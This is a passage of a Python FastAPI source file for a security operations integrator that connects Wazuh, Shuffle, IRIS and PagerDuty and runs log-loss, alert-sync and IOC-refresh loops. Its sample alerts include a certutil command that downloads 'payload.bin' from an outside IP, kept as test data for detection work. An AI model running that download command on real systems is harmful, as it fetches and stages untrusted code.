Bez popisu

main.py 102KB

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989910010110210310410510610710810911011111211311411511611711811912012112212312412512612712812913013113213313413513613713813914014114214314414514614714814915015115215315415515615715815916016116216316416516616716816917017117217317417517617717817918018118218318418518618718818919019119219319419519619719819920020120220320420520620720820921021121221321421521621721821922022122222322422522622722822923023123223323423523623723823924024124224324424524624724824925025125225325425525625725825926026126226326426526626726826927027127227327427527627727827928028128228328428528628728828929029129229329429529629729829930030130230330430530630730830931031131231331431531631731831932032132232332432532632732832933033133233333433533633733833934034134234334434534634734834935035135235335435535635735835936036136236336436536636736836937037137237337437537637737837938038138238338438538638738838939039139239339439539639739839940040140240340440540640740840941041141241341441541641741841942042142242342442542642742842943043143243343443543643743843944044144244344444544644744844945045145245345445545645745845946046146246346446546646746846947047147247347447547647747847948048148248348448548648748848949049149249349449549649749849950050150250350450550650750850951051151251351451551651751851952052152252352452552652752852953053153253353453553653753853954054154254354454554654754854955055155255355455555655755855956056156256356456556656756856957057157257357457557657757857958058158258358458558658758858959059159259359459559659759859960060160260360460560660760860961061161261361461561661761861962062162262362462562662762862963063163263363463563663763863964064164264364464564664764864965065165265365465565665765865966066166266366466566666766866967067167267367467567667767867968068168268368468568668768868969069169269369469569669769869970070170270370470570670770870971071171271371471571671771871972072172272372472572672772872973073173273373473573673773873974074174274374474574674774874975075175275375475575675775875976076176276376476576676776876977077177277377477577677777877978078178278378478578678778878979079179279379479579679779879980080180280380480580680780880981081181281381481581681781881982082182282382482582682782882983083183283383483583683783883984084184284384484584684784884985085185285385485585685785885986086186286386486586686786886987087187287387487587687787887988088188288388488588688788888989089189289389489589689789889990090190290390490590690790890991091191291391491591691791891992092192292392492592692792892993093193293393493593693793893994094194294394494594694794894995095195295395495595695795895996096196296396496596696796896997097197297397497597697797897998098198298398498598698798898999099199299399499599699799899910001001100210031004100510061007100810091010101110121013101410151016101710181019102010211022102310241025102610271028102910301031103210331034103510361037103810391040104110421043104410451046104710481049105010511052105310541055105610571058105910601061106210631064106510661067106810691070107110721073107410751076107710781079108010811082108310841085108610871088108910901091109210931094109510961097109810991100110111021103110411051106110711081109111011111112111311141115111611171118111911201121112211231124112511261127112811291130113111321133113411351136113711381139114011411142114311441145114611471148114911501151115211531154115511561157115811591160116111621163116411651166116711681169117011711172117311741175117611771178117911801181118211831184118511861187118811891190119111921193119411951196119711981199120012011202120312041205120612071208120912101211121212131214121512161217121812191220122112221223122412251226122712281229123012311232123312341235123612371238123912401241124212431244124512461247124812491250125112521253125412551256125712581259126012611262126312641265126612671268126912701271127212731274127512761277127812791280128112821283128412851286128712881289129012911292129312941295129612971298129913001301130213031304130513061307130813091310131113121313131413151316131713181319132013211322132313241325132613271328132913301331133213331334133513361337133813391340134113421343134413451346134713481349135013511352135313541355135613571358135913601361136213631364136513661367136813691370137113721373137413751376137713781379138013811382138313841385138613871388138913901391139213931394139513961397139813991400140114021403140414051406140714081409141014111412141314141415141614171418141914201421142214231424142514261427142814291430143114321433143414351436143714381439144014411442144314441445144614471448144914501451145214531454145514561457145814591460146114621463146414651466146714681469147014711472147314741475147614771478147914801481148214831484148514861487148814891490149114921493149414951496149714981499150015011502150315041505150615071508150915101511151215131514151515161517151815191520152115221523152415251526152715281529153015311532153315341535153615371538153915401541154215431544154515461547154815491550155115521553155415551556155715581559156015611562156315641565156615671568156915701571157215731574157515761577157815791580158115821583158415851586158715881589159015911592159315941595159615971598159916001601160216031604160516061607160816091610161116121613161416151616161716181619162016211622162316241625162616271628162916301631163216331634163516361637163816391640164116421643164416451646164716481649165016511652165316541655165616571658165916601661166216631664166516661667166816691670167116721673167416751676167716781679168016811682168316841685168616871688168916901691169216931694169516961697169816991700170117021703170417051706170717081709171017111712171317141715171617171718171917201721172217231724172517261727172817291730173117321733173417351736173717381739174017411742174317441745174617471748174917501751175217531754175517561757175817591760176117621763176417651766176717681769177017711772177317741775177617771778177917801781178217831784178517861787178817891790179117921793179417951796179717981799180018011802180318041805180618071808180918101811181218131814181518161817181818191820182118221823182418251826182718281829183018311832183318341835183618371838183918401841184218431844184518461847184818491850185118521853185418551856185718581859186018611862186318641865186618671868186918701871187218731874187518761877187818791880188118821883188418851886188718881889189018911892189318941895189618971898189919001901190219031904190519061907190819091910191119121913191419151916191719181919192019211922192319241925192619271928192919301931193219331934193519361937193819391940194119421943194419451946194719481949195019511952195319541955195619571958195919601961196219631964196519661967196819691970197119721973197419751976197719781979198019811982198319841985198619871988198919901991199219931994199519961997199819992000200120022003200420052006200720082009201020112012201320142015201620172018201920202021202220232024202520262027202820292030203120322033203420352036203720382039204020412042204320442045204620472048204920502051205220532054205520562057205820592060206120622063206420652066206720682069207020712072207320742075207620772078207920802081208220832084208520862087208820892090209120922093209420952096209720982099210021012102210321042105210621072108210921102111211221132114211521162117211821192120212121222123212421252126212721282129213021312132213321342135213621372138213921402141214221432144214521462147214821492150215121522153215421552156215721582159216021612162216321642165216621672168216921702171217221732174217521762177217821792180218121822183218421852186218721882189219021912192219321942195219621972198219922002201220222032204220522062207220822092210221122122213221422152216221722182219222022212222222322242225222622272228222922302231223222332234223522362237223822392240224122422243224422452246224722482249225022512252225322542255225622572258225922602261226222632264226522662267226822692270227122722273227422752276227722782279228022812282228322842285228622872288228922902291229222932294229522962297229822992300230123022303230423052306230723082309231023112312231323142315231623172318231923202321232223232324232523262327232823292330233123322333233423352336233723382339234023412342234323442345234623472348234923502351235223532354235523562357235823592360236123622363236423652366236723682369237023712372237323742375237623772378237923802381238223832384238523862387238823892390239123922393239423952396239723982399240024012402240324042405240624072408240924102411241224132414241524162417241824192420242124222423242424252426242724282429243024312432243324342435243624372438243924402441244224432444244524462447244824492450245124522453245424552456245724582459246024612462246324642465246624672468246924702471247224732474247524762477247824792480248124822483248424852486248724882489249024912492249324942495249624972498249925002501250225032504250525062507250825092510251125122513251425152516251725182519252025212522252325242525252625272528252925302531253225332534253525362537253825392540254125422543254425452546254725482549255025512552255325542555255625572558255925602561256225632564256525662567256825692570257125722573257425752576257725782579258025812582258325842585258625872588258925902591259225932594259525962597259825992600260126022603260426052606260726082609261026112612261326142615261626172618261926202621262226232624262526262627262826292630263126322633263426352636263726382639264026412642264326442645264626472648264926502651265226532654265526562657265826592660266126622663266426652666266726682669267026712672267326742675267626772678267926802681268226832684268526862687268826892690269126922693269426952696269726982699270027012702270327042705270627072708270927102711271227132714271527162717271827192720272127222723272427252726272727282729273027312732273327342735273627372738273927402741274227432744274527462747274827492750275127522753275427552756275727582759276027612762276327642765276627672768276927702771277227732774277527762777277827792780278127822783278427852786278727882789279027912792279327942795279627972798279928002801280228032804280528062807280828092810281128122813
  1. import asyncio
  2. import logging
  3. import os
  4. import re
  5. import shlex
  6. import subprocess
  7. import uuid
  8. from collections import deque
  9. from datetime import datetime, timedelta, timezone
  10. from pathlib import Path
  11. from psycopg import sql
  12. from fastapi import Depends, FastAPI, File, HTTPException, Request, UploadFile
  13. import csv
  14. import io
  15. from fastapi.responses import FileResponse, Response, StreamingResponse
  16. from fastapi.staticfiles import StaticFiles
  17. from app.adapters.abuseipdb import AbuseIpdbAdapter
  18. from app.adapters.geoip import GeoIpAdapter
  19. from app.adapters.ioc_feed import IocFeedAdapter
  20. from app.adapters.iris import IrisAdapter
  21. from app.adapters.pagerduty import PagerDutyAdapter
  22. from app.adapters.shuffle import ShuffleAdapter
  23. from app.adapters.virustotal import VirusTotalAdapter
  24. from app.adapters.wazuh import WazuhAdapter
  25. from app.config import settings
  26. from app.db import get_conn, init_schema
  27. from app.models import (
  28. ActionCreateIncidentRequest,
  29. ApiResponse,
  30. CDetectionEvaluateRequest,
  31. IocEnrichRequest,
  32. IocEvaluateRequest,
  33. IrisAlertCreateRequest,
  34. IrisTicketCreateRequest,
  35. LogLossCheckRequest,
  36. LogLossStreamCheck,
  37. SimLogRunRequest,
  38. ShuffleLoginRequest,
  39. ShuffleProxyRequest,
  40. SyncPolicyRequest,
  41. TriggerShuffleRequest,
  42. WazuhIngestRequest,
  43. )
  44. from app.repositories.mvp_repo import MvpRepository
  45. from app.routes.mvp import build_mvp_router
  46. from app.security import require_internal_api_key
  47. from app.services.ioc_list_service import IocListService
  48. from app.services.mvp_service import MvpService
  49. from app.services.c_detection_service import CDetectionService
  50. app = FastAPI(title=settings.app_name, version="0.1.0")
  51. logger = logging.getLogger(__name__)
  52. UI_DIR = Path(__file__).resolve().parent / "ui"
  53. UI_ASSETS_DIR = UI_DIR / "assets"
  54. SIM_SCRIPTS_DIR = Path("/app/scripts")
  55. SIM_RUN_LOGS_DIR = Path("/tmp/soc-integrator-sim-logs")
  56. wazuh_adapter = WazuhAdapter(
  57. base_url=settings.wazuh_base_url,
  58. username=settings.wazuh_username,
  59. password=settings.wazuh_password,
  60. indexer_url=settings.wazuh_indexer_url,
  61. indexer_username=settings.wazuh_indexer_username,
  62. indexer_password=settings.wazuh_indexer_password,
  63. )
  64. shuffle_adapter = ShuffleAdapter(
  65. base_url=settings.shuffle_base_url,
  66. api_key=settings.shuffle_api_key,
  67. )
  68. pagerduty_adapter = PagerDutyAdapter(
  69. base_url=settings.pagerduty_base_url,
  70. api_key=settings.pagerduty_api_key,
  71. )
  72. iris_adapter = IrisAdapter(
  73. base_url=settings.iris_base_url,
  74. api_key=settings.iris_api_key,
  75. )
  76. virustotal_adapter = VirusTotalAdapter(
  77. base_url=settings.virustotal_base_url,
  78. api_key=settings.virustotal_api_key,
  79. )
  80. abuseipdb_adapter = AbuseIpdbAdapter(
  81. base_url=settings.abuseipdb_base_url,
  82. api_key=settings.abuseipdb_api_key,
  83. )
  84. geoip_adapter = GeoIpAdapter(
  85. provider=settings.geoip_provider,
  86. cache_ttl_seconds=settings.geoip_cache_ttl_seconds,
  87. )
  88. repo = MvpRepository()
  89. mvp_service = MvpService(
  90. repo=repo,
  91. wazuh_adapter=wazuh_adapter,
  92. shuffle_adapter=shuffle_adapter,
  93. iris_adapter=iris_adapter,
  94. pagerduty_adapter=pagerduty_adapter,
  95. virustotal_adapter=virustotal_adapter,
  96. abuseipdb_adapter=abuseipdb_adapter,
  97. )
  98. c_detection_service = CDetectionService(
  99. repo=repo,
  100. geoip_adapter=geoip_adapter,
  101. )
  102. ioc_list_service = IocListService(
  103. repo=repo,
  104. wazuh_adapter=wazuh_adapter,
  105. feed_adapter=IocFeedAdapter(),
  106. lists_path=settings.wazuh_lists_path,
  107. confidence_threshold=settings.ioc_refresh_confidence_threshold,
  108. lookback_days=settings.ioc_refresh_lookback_days,
  109. )
  110. app.include_router(build_mvp_router(mvp_service, require_internal_api_key))
  111. app.mount("/ui/assets", StaticFiles(directory=str(UI_ASSETS_DIR)), name="ui-assets")
  112. @app.middleware("http")
  113. async def ui_no_cache_middleware(request: Request, call_next):
  114. response: Response = await call_next(request)
  115. if request.url.path == "/ui" or request.url.path.startswith("/ui/assets/"):
  116. response.headers["Cache-Control"] = "no-store, no-cache, must-revalidate, max-age=0"
  117. response.headers["Pragma"] = "no-cache"
  118. response.headers["Expires"] = "0"
  119. return response
  120. DEFAULT_LOG_LOSS_STREAMS: list[dict[str, object]] = [
  121. {
  122. "name": "fortigate",
  123. "query": "full_log:fortigate OR full_log:FGT80F OR full_log:FGT60F OR full_log:FGT40F OR full_log:FGT501E",
  124. "min_count": 1,
  125. },
  126. {
  127. "name": "windows_agent",
  128. "query": "full_log:windows_agent OR full_log:windows",
  129. "min_count": 1,
  130. },
  131. {
  132. "name": "vmware",
  133. "query": "full_log:vmware",
  134. "min_count": 1,
  135. },
  136. {
  137. "name": "log_monitor",
  138. "query": "full_log:log_monitor OR rule.id:100411",
  139. "min_count": 1,
  140. },
  141. ]
  142. async def _execute_log_loss_check(
  143. req: LogLossCheckRequest,
  144. create_ticket: bool,
  145. ) -> dict[str, object]:
  146. minutes = max(1, int(req.minutes))
  147. streams = req.streams or [LogLossStreamCheck(**item) for item in DEFAULT_LOG_LOSS_STREAMS]
  148. items: list[dict[str, object]] = []
  149. loss_count = 0
  150. error_count = 0
  151. loss_stream_names: list[str] = []
  152. for stream in streams:
  153. min_count = max(0, int(stream.min_count))
  154. try:
  155. observed = await wazuh_adapter.count_alerts(query=stream.query, minutes=minutes)
  156. is_loss = observed < min_count
  157. if is_loss:
  158. loss_count += 1
  159. loss_stream_names.append(stream.name)
  160. items.append(
  161. {
  162. "name": stream.name,
  163. "query": stream.query,
  164. "minutes": minutes,
  165. "min_count": min_count,
  166. "observed_count": observed,
  167. "status": "loss" if is_loss else "ok",
  168. }
  169. )
  170. except Exception as exc:
  171. error_count += 1
  172. items.append(
  173. {
  174. "name": stream.name,
  175. "query": stream.query,
  176. "minutes": minutes,
  177. "min_count": min_count,
  178. "observed_count": None,
  179. "status": "error",
  180. "error": str(exc),
  181. }
  182. )
  183. summary = {
  184. "total_streams": len(items),
  185. "loss_streams": loss_count,
  186. "error_streams": error_count,
  187. "all_ok": loss_count == 0 and error_count == 0,
  188. }
  189. ticket_data: dict[str, object] | None = None
  190. if create_ticket and loss_count > 0:
  191. cooldown = max(0, int(settings.log_loss_monitor_ticket_cooldown_seconds))
  192. now_ts = datetime.now(timezone.utc).timestamp()
  193. state = app.state.log_loss_monitor_state
  194. last_ticket_ts = float(state.get("last_ticket_ts", 0.0) or 0.0)
  195. in_cooldown = cooldown > 0 and (now_ts - last_ticket_ts) < cooldown
  196. if not in_cooldown:
  197. title = f"Log loss detected ({loss_count} stream(s))"
  198. description = (
  199. f"Log-loss monitor detected missing telemetry in the last {minutes} minute(s). "
  200. f"Affected streams: {', '.join(loss_stream_names)}."
  201. )
  202. case_payload = {
  203. "case_name": title,
  204. "case_description": description,
  205. "case_customer": settings.iris_default_customer_id,
  206. "case_soc_id": settings.iris_default_soc_id,
  207. }
  208. try:
  209. iris_result = await iris_adapter.create_case(case_payload)
  210. state["last_ticket_ts"] = now_ts
  211. ticket_data = {"created": True, "iris": iris_result}
  212. except Exception as exc:
  213. ticket_data = {"created": False, "error": str(exc)}
  214. else:
  215. ticket_data = {
  216. "created": False,
  217. "skipped": "cooldown_active",
  218. "cooldown_seconds": cooldown,
  219. "last_ticket_ts": last_ticket_ts,
  220. }
  221. result: dict[str, object] = {
  222. "checked_at": datetime.now(timezone.utc).isoformat(),
  223. "minutes": minutes,
  224. "summary": summary,
  225. "streams": items,
  226. }
  227. if ticket_data is not None:
  228. result["ticket"] = ticket_data
  229. return result
  230. async def _log_loss_monitor_loop() -> None:
  231. interval = max(5, int(settings.log_loss_monitor_interval_seconds))
  232. while True:
  233. started_at = datetime.now(timezone.utc).isoformat()
  234. try:
  235. app.state.log_loss_monitor_state["running"] = True
  236. app.state.log_loss_monitor_state["last_started_at"] = started_at
  237. req = LogLossCheckRequest(minutes=max(1, int(settings.log_loss_monitor_window_minutes)))
  238. result = await _execute_log_loss_check(
  239. req=req,
  240. create_ticket=bool(settings.log_loss_monitor_create_iris_ticket),
  241. )
  242. app.state.log_loss_monitor_state["last_status"] = "ok"
  243. app.state.log_loss_monitor_state["last_result"] = result
  244. app.state.log_loss_monitor_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  245. logger.info(
  246. "log-loss monitor checked=%s loss=%s errors=%s",
  247. result.get("summary", {}).get("total_streams", 0),
  248. result.get("summary", {}).get("loss_streams", 0),
  249. result.get("summary", {}).get("error_streams", 0),
  250. )
  251. except Exception as exc:
  252. app.state.log_loss_monitor_state["last_status"] = "error"
  253. app.state.log_loss_monitor_state["last_error"] = str(exc)
  254. app.state.log_loss_monitor_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  255. logger.exception("log-loss monitor failed: %s", exc)
  256. finally:
  257. app.state.log_loss_monitor_state["running"] = False
  258. await asyncio.sleep(interval)
  259. async def _wazuh_auto_sync_loop() -> None:
  260. interval = max(5, int(settings.wazuh_auto_sync_interval_seconds))
  261. while True:
  262. started_at = datetime.now(timezone.utc).isoformat()
  263. try:
  264. app.state.wazuh_auto_sync_state["running"] = True
  265. app.state.wazuh_auto_sync_state["last_started_at"] = started_at
  266. result = await mvp_service.sync_wazuh_alerts(
  267. query=settings.wazuh_auto_sync_query,
  268. limit=settings.wazuh_auto_sync_limit,
  269. minutes=settings.wazuh_auto_sync_minutes,
  270. )
  271. app.state.wazuh_auto_sync_state["last_status"] = "ok"
  272. app.state.wazuh_auto_sync_state["last_result"] = result
  273. app.state.wazuh_auto_sync_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  274. logger.info(
  275. "wazuh auto-sync processed=%s ingested=%s skipped=%s failed=%s ioc_evaluated=%s ioc_matched=%s ioc_rejected=%s",
  276. result.get("processed", 0),
  277. result.get("ingested", 0),
  278. result.get("skipped_existing", 0),
  279. result.get("failed", 0),
  280. result.get("ioc_evaluated", 0),
  281. result.get("ioc_matched", 0),
  282. result.get("ioc_rejected", 0),
  283. )
  284. except Exception as exc:
  285. app.state.wazuh_auto_sync_state["last_status"] = "error"
  286. app.state.wazuh_auto_sync_state["last_error"] = str(exc)
  287. app.state.wazuh_auto_sync_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  288. logger.exception("wazuh auto-sync failed: %s", exc)
  289. finally:
  290. app.state.wazuh_auto_sync_state["running"] = False
  291. await asyncio.sleep(interval)
  292. async def _ioc_refresh_loop() -> None:
  293. interval = max(300, int(settings.ioc_refresh_interval_seconds))
  294. while True:
  295. started_at = datetime.now(timezone.utc).isoformat()
  296. try:
  297. app.state.ioc_refresh_state["running"] = True
  298. app.state.ioc_refresh_state["last_started_at"] = started_at
  299. result = await ioc_list_service.refresh()
  300. app.state.ioc_refresh_state["last_status"] = "ok"
  301. app.state.ioc_refresh_state["last_result"] = result
  302. app.state.ioc_refresh_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  303. lists = result.get("lists", {})
  304. logger.info(
  305. "ioc-refresh complete ips=%s domains=%s hashes=%s wazuh_restarted=%s errors=%s",
  306. lists.get("malicious_ips", 0),
  307. lists.get("malicious_domains", 0),
  308. lists.get("malware_hashes", 0),
  309. result.get("wazuh_restarted"),
  310. len(result.get("errors", [])),
  311. )
  312. except Exception as exc:
  313. app.state.ioc_refresh_state["last_status"] = "error"
  314. app.state.ioc_refresh_state["last_error"] = str(exc)
  315. app.state.ioc_refresh_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  316. logger.exception("ioc-refresh failed: %s", exc)
  317. finally:
  318. app.state.ioc_refresh_state["running"] = False
  319. await asyncio.sleep(interval)
  320. def _c_match_to_incident_event(match: dict[str, object]) -> dict[str, object]:
  321. event = dict(match.get("event") or {})
  322. usecase_id = str(match.get("usecase_id") or "C-unknown")
  323. section = str(match.get("section") or "c")
  324. severity = str(match.get("severity") or "medium")
  325. entity = str(match.get("entity") or "unknown")
  326. evidence = dict(match.get("evidence") or {})
  327. source = str(event.get("source") or "wazuh")
  328. timestamp = str(event.get("timestamp") or datetime.now(timezone.utc).isoformat())
  329. event_id = str(event.get("event_id") or f"{usecase_id}-{int(datetime.now(timezone.utc).timestamp())}")
  330. payload = dict(event.get("payload") or {})
  331. asset = dict(event.get("asset") or {})
  332. network = dict(event.get("network") or {})
  333. event_type = "c2_credential_abuse"
  334. if section == "c1":
  335. event_type = "c1_impossible_travel"
  336. elif section == "c3":
  337. event_type = "c3_lateral_movement"
  338. title = f"{usecase_id} detection for {entity}"
  339. description = f"{usecase_id} matched for entity={entity}. evidence={evidence}"
  340. tags = list(event.get("tags") or [])
  341. tags.extend(["appendix_c", usecase_id.lower(), section])
  342. return {
  343. "source": source,
  344. "event_type": event_type,
  345. "event_id": event_id,
  346. "timestamp": timestamp,
  347. "severity": severity,
  348. "title": title,
  349. "description": description,
  350. "asset": asset,
  351. "network": network,
  352. "tags": sorted(set(tags)),
  353. "risk_context": {"appendix_c_usecase": usecase_id},
  354. "raw": event.get("raw") or {},
  355. "payload": payload,
  356. }
  357. @app.on_event("startup")
  358. async def startup() -> None:
  359. init_schema()
  360. repo.ensure_policy()
  361. app.state.wazuh_auto_sync_state = {
  362. "running": False,
  363. "last_status": None,
  364. "last_started_at": None,
  365. "last_finished_at": None,
  366. "last_error": None,
  367. "last_result": None,
  368. }
  369. app.state.log_loss_monitor_state = {
  370. "running": False,
  371. "last_status": None,
  372. "last_started_at": None,
  373. "last_finished_at": None,
  374. "last_error": None,
  375. "last_result": None,
  376. "last_ticket_ts": 0.0,
  377. }
  378. app.state.c_detection_state = {
  379. "last_status": None,
  380. "last_started_at": None,
  381. "last_finished_at": None,
  382. "last_error": None,
  383. "last_result": None,
  384. "last_ticket_ts_by_key": {},
  385. }
  386. app.state.systems_monitor_state = {
  387. "last_ok_at": {},
  388. }
  389. app.state.ioc_refresh_state = {
  390. "running": False,
  391. "last_status": None,
  392. "last_started_at": None,
  393. "last_finished_at": None,
  394. "last_error": None,
  395. "last_result": None,
  396. }
  397. app.state.sim_runs = {}
  398. SIM_RUN_LOGS_DIR.mkdir(parents=True, exist_ok=True)
  399. if settings.ioc_refresh_enabled:
  400. app.state.ioc_refresh_task = asyncio.create_task(_ioc_refresh_loop())
  401. logger.info(
  402. "ioc-refresh enabled interval=%ss confidence=%.2f lookback_days=%s path=%s",
  403. settings.ioc_refresh_interval_seconds,
  404. settings.ioc_refresh_confidence_threshold,
  405. settings.ioc_refresh_lookback_days,
  406. settings.wazuh_lists_path,
  407. )
  408. if settings.wazuh_auto_sync_enabled:
  409. app.state.wazuh_auto_sync_task = asyncio.create_task(_wazuh_auto_sync_loop())
  410. logger.info(
  411. "wazuh auto-sync enabled interval=%ss limit=%s minutes=%s query=%s",
  412. settings.wazuh_auto_sync_interval_seconds,
  413. settings.wazuh_auto_sync_limit,
  414. settings.wazuh_auto_sync_minutes,
  415. settings.wazuh_auto_sync_query,
  416. )
  417. if settings.log_loss_monitor_enabled:
  418. app.state.log_loss_monitor_task = asyncio.create_task(_log_loss_monitor_loop())
  419. logger.info(
  420. "log-loss monitor enabled interval=%ss window=%sm create_iris_ticket=%s cooldown=%ss",
  421. settings.log_loss_monitor_interval_seconds,
  422. settings.log_loss_monitor_window_minutes,
  423. settings.log_loss_monitor_create_iris_ticket,
  424. settings.log_loss_monitor_ticket_cooldown_seconds,
  425. )
  426. @app.on_event("shutdown")
  427. async def shutdown() -> None:
  428. task = getattr(app.state, "wazuh_auto_sync_task", None)
  429. if task:
  430. task.cancel()
  431. try:
  432. await task
  433. except asyncio.CancelledError:
  434. pass
  435. ll_task = getattr(app.state, "log_loss_monitor_task", None)
  436. if ll_task:
  437. ll_task.cancel()
  438. try:
  439. await ll_task
  440. except asyncio.CancelledError:
  441. pass
  442. ioc_task = getattr(app.state, "ioc_refresh_task", None)
  443. if ioc_task:
  444. ioc_task.cancel()
  445. try:
  446. await ioc_task
  447. except asyncio.CancelledError:
  448. pass
  449. sim_runs = getattr(app.state, "sim_runs", {})
  450. for run in sim_runs.values():
  451. process = run.get("process")
  452. if process and process.poll() is None:
  453. process.terminate()
  454. @app.get(
  455. "/ui",
  456. summary="SOC Integrator UI",
  457. description="Serve the built-in Alpine.js operations console.",
  458. include_in_schema=False,
  459. )
  460. async def ui_index() -> FileResponse:
  461. if not UI_DIR.exists():
  462. raise HTTPException(status_code=404, detail="UI is not available in this build")
  463. return FileResponse(UI_DIR / "index.html")
  464. @app.get(
  465. "/health",
  466. response_model=ApiResponse,
  467. summary="Service health",
  468. description="Return soc-integrator service identity and configured upstream targets.",
  469. )
  470. async def health() -> ApiResponse:
  471. return ApiResponse(
  472. data={
  473. "service": settings.app_name,
  474. "env": settings.app_env,
  475. "targets": {
  476. "wazuh": settings.wazuh_base_url,
  477. "shuffle": settings.shuffle_base_url,
  478. "pagerduty": settings.pagerduty_base_url,
  479. "iris": settings.iris_base_url,
  480. },
  481. }
  482. )
  483. def _build_wazuh_hit_from_ingest(payload: WazuhIngestRequest) -> dict[str, object]:
  484. src_payload = dict(payload.payload or {})
  485. src_payload.setdefault("@timestamp", datetime.now(timezone.utc).isoformat())
  486. src_payload.setdefault("id", payload.alert_id)
  487. src_payload.setdefault(
  488. "rule",
  489. {
  490. "id": payload.rule_id or "unknown",
  491. "level": payload.severity if payload.severity is not None else 5,
  492. "description": payload.title or "Wazuh alert",
  493. },
  494. )
  495. return {"_id": payload.alert_id or f"wazuh-{uuid.uuid4().hex[:12]}", "_source": src_payload}
  496. def _normalize_wazuh_ingest_payload(payload: WazuhIngestRequest) -> dict[str, object]:
  497. normalized = {
  498. "source": payload.source,
  499. "alert_id": payload.alert_id,
  500. "rule_id": payload.rule_id,
  501. "severity": payload.severity,
  502. "title": payload.title,
  503. "payload": payload.payload,
  504. }
  505. hit = _build_wazuh_hit_from_ingest(payload)
  506. normalized_event = mvp_service.normalize_wazuh_hit(hit)
  507. return {
  508. "normalized": normalized,
  509. "normalized_event": normalized_event,
  510. }
  511. @app.post(
  512. "/ingest/wazuh-alert",
  513. response_model=ApiResponse,
  514. summary="Normalize Wazuh alert",
  515. description="Normalize a raw Wazuh alert payload into both legacy ingest shape and SOC normalized event shape.",
  516. )
  517. async def ingest_wazuh_alert(payload: WazuhIngestRequest) -> ApiResponse:
  518. return ApiResponse(data=_normalize_wazuh_ingest_payload(payload))
  519. @app.get(
  520. "/ingest/wazuh-alert/samples",
  521. response_model=ApiResponse,
  522. summary="Sample normalization cases",
  523. description="Return sample Wazuh event-log cases with expected normalized output for testing and integration.",
  524. )
  525. async def ingest_wazuh_alert_samples() -> ApiResponse:
  526. sample_payloads = [
  527. WazuhIngestRequest(
  528. source="wazuh",
  529. rule_id="110302",
  530. alert_id="sample-a1-02",
  531. severity=8,
  532. title="A1 production: DNS IOC domain match event",
  533. payload={
  534. "@timestamp": datetime.now(timezone.utc).isoformat(),
  535. "full_log": "Mar 04 09:42:24 dns-fw-01 soc_mvp_test=true source=dns severity=medium event_type=ioc_domain_match src_ip=10.12.132.85 ioc_type=domain ioc_value=ioc-2080.malicious.example feed=threatintel_main confidence=high action=alert",
  536. "agent": {"name": "dns-fw-01", "id": "001"},
  537. },
  538. ),
  539. WazuhIngestRequest(
  540. source="wazuh",
  541. rule_id="110402",
  542. alert_id="sample-b1-02",
  543. severity=8,
  544. title="B1 production: ESXi SSH enabled",
  545. payload={
  546. "@timestamp": datetime.now(timezone.utc).isoformat(),
  547. "full_log": "Mar 04 09:42:28 esxi-01 soc_mvp_test=true source=vmware severity=medium event_type=vmware_esxi_enable_ssh action=enable service=ssh user=root host=esxi-01 src_ip=203.0.113.115",
  548. "agent": {"name": "esxi-01", "id": "002"},
  549. },
  550. ),
  551. WazuhIngestRequest(
  552. source="wazuh",
  553. rule_id="110426",
  554. alert_id="sample-b3-06",
  555. severity=8,
  556. title="B3 production: CertUtil download pattern",
  557. payload={
  558. "@timestamp": datetime.now(timezone.utc).isoformat(),
  559. "full_log": "Mar 04 09:42:35 win-sysmon-01 soc_mvp_test=true source=windows_sysmon severity=medium event_type=sysmon_certutil_download event_id=1 process=certutil.exe cmdline=\"certutil -urlcache -split -f http://198.51.100.22/payload.bin payload.bin\" src_ip=10.10.10.5",
  560. "agent": {"name": "win-sysmon-01", "id": "003"},
  561. },
  562. ),
  563. WazuhIngestRequest(
  564. source="wazuh",
  565. rule_id="110501",
  566. alert_id="sample-c1-01",
  567. severity=12,
  568. title="C1 production: Impossible travel",
  569. payload={
  570. "@timestamp": datetime.now(timezone.utc).isoformat(),
  571. "full_log": "Mar 04 09:44:10 fgt-vpn-01 source=vpn severity=high event_type=vpn_login_success event_id=4624 success=true user=alice.admin src_ip=8.8.8.8 country=US src_lat=37.3861 src_lon=-122.0839 dst_host=vpn-gw-01",
  572. "agent": {"name": "fgt-vpn-01", "id": "004"},
  573. },
  574. ),
  575. ]
  576. cases = []
  577. for item in sample_payloads:
  578. cases.append(
  579. {
  580. "name": str(item.alert_id),
  581. "request": item.model_dump(mode="json"),
  582. "result": _normalize_wazuh_ingest_payload(item),
  583. }
  584. )
  585. return ApiResponse(data={"cases": cases, "count": len(cases)})
  586. @app.post(
  587. "/action/create-incident",
  588. response_model=ApiResponse,
  589. summary="Create PagerDuty incident",
  590. description="Create an incident in PagerDuty (stub or real integration) from request payload.",
  591. )
  592. async def create_incident(payload: ActionCreateIncidentRequest) -> ApiResponse:
  593. incident_payload = {
  594. "title": payload.title,
  595. "urgency": payload.severity,
  596. "incident_key": payload.dedupe_key,
  597. "body": payload.payload,
  598. "source": payload.source,
  599. }
  600. try:
  601. pd_result = await pagerduty_adapter.create_incident(incident_payload)
  602. except Exception as exc:
  603. raise HTTPException(status_code=502, detail=f"PagerDuty call failed: {exc}") from exc
  604. return ApiResponse(data={"pagerduty": pd_result})
  605. @app.post(
  606. "/action/trigger-shuffle",
  607. response_model=ApiResponse,
  608. summary="Trigger Shuffle workflow",
  609. description="Execute a Shuffle workflow by ID with execution_argument payload.",
  610. )
  611. async def trigger_shuffle(payload: TriggerShuffleRequest) -> ApiResponse:
  612. try:
  613. shuffle_result = await shuffle_adapter.trigger_workflow(
  614. workflow_id=payload.workflow_id,
  615. payload=payload.execution_argument,
  616. )
  617. except Exception as exc:
  618. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  619. return ApiResponse(data={"shuffle": shuffle_result})
  620. @app.get(
  621. "/shuffle/health",
  622. response_model=ApiResponse,
  623. summary="Shuffle health",
  624. description="Check Shuffle backend health endpoint through adapter connectivity.",
  625. )
  626. async def shuffle_health() -> ApiResponse:
  627. try:
  628. result = await shuffle_adapter.health()
  629. except Exception as exc:
  630. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  631. return ApiResponse(data={"shuffle": result})
  632. @app.get(
  633. "/shuffle/auth-test",
